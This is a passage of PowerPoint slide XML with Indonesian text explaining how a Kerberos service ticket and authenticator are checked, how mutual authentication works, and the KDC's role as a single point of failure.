              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasianya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tercemar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> timbal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kerberos yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KDC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktiknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server KDC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
